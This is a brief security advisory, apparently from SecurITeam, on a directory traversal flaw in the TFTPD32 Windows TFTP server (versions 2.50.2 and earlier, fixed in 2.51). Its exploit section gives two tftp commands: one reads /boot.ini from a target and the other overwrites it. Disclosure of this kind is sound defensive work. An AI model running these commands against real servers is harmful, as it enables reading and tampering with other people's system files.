‘TFTPD32 Directory Traversal Vulnerability’

Summary

TFTPD32 is a Freeware TFTP server for windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350).

A vulnerability in the product allows remote attackers to view any file on the system as well as write to arbitrary locations.’

Credit:

‘The information has been provided by SecurITeam Experts.’


Details

Vulnerable systems:
 * TFTP32 version 2.50.2 and prior

Immune systems:
 * TFTP32 version 2.51

Exploit:
Getting files:
tftp host GET /boot.ini

Storing files:
tftp host PUT myfile /boot.ini

Categories: Windows